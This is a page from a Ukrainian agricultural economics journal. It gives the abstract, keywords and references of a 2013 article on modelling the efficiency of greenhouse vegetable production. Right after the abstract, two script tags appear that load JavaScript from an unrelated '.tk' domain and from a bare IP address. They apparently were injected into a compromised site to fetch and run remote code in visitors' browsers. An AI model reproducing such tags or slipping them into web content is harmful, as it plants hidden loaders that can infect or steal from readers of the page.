ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.15.017.1
Економіка агропромислового виробництва

Моделювання показників ефективності виробництва овочів закритого грунту / Іваненко В. Ф. // Економіка АПК. - 2013. - № 3 - С. 35

Досліджено показники ефективності виробництва овочів закритого ґрунту при застосуванні альтернативних технологій. Вивчено ефективність голландської технології компанії Netafim в агрокліматичних умовах Лісостепу України. Проаналізовано основні показники економічної ефективності виробництва овочів закритого ґрунту при застосуванні різних технологій та рівня інтенсифікації галузі. Проведено порівняльну оцінку структури собівартості продукції та встановлено залежність рентабельності підприємства від складових структури витрат. Розроблено методологію моделювання окремих показників ефективності виробництва овочів в умовах спеціалізованих овочевих комбінатів. Розраховано потенційний показник рентабельності виробництва томатів закритого ґрунту в умовах ПАТ «Комбінат «Тепличний». Табл.: 3. Рис.: 3. Бібліогр.: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: енергозбереження, ефективність виробництва, собівартість продукції, рентабельність, моделювання показників виробництва, овочівництво закритого ґрунту

Список використаних джерел

  1. Іваненко П.П. Закритий ґрунт: навч. посіб. / П.П. Іваненко, О.В. Приліпка. – К.: Урожай, 2001. – 360 с.
  2. Корчемний М. Енергозбереження в агропромисловому комплексі / М. Корчемний, В. Федорейко, В. Щербань. – Тернопіль: Підручники і посібники, 2001. – 984 с.
  3. Мороз О.В. Енерговикористання в сільському господарстві України: автореф. дис. ... докт. екон. наук / О.В. Мороз. – К., 1998. – 22 с.
  4. Немтінов В.І. Теоретичне обґрунтування стратегії енергозбереження при вирощуванні овочевих рослин у захищеному ґрунті півдня України: автореф. дис. ... докт. с-г. наук. / 1. В.І. Немтінов. – К., 2006. – 40 с.
  5. Сизонова І.В. Організаційно-економічні основи енергозбереження в сільському господарстві: автореф. дис. канд. екон. наук / І.В Сизонова. – С., 2005. – 25 с.
  6. Трачова Д.М. Енергозбереження як передумова функціонування тепличних підприємств. Ринкові трансформації та розвиток продуктивних сил аграрного сектора / Д.М. Трачова // Вісн. ХНАУ. – 2004. – № 9. – С. 217 – 221.
  7. Canakci M. Energy use pattern analyses of greenhouse vegetable production / M.Canakci, I.Akinci // Energy 2006. – №31. – Р.1243–1256.
  8. Pahlavan R. Modeling and sensitivity analysis of energy inputs for greenhouse cucumber production / Pahlavan, R., Omid, M., Akram, A. // Journal of Agricultural Technology 2011. – Vol. 7(6). – Р.1509–1521
Читати статтю: 13_03_04.pdf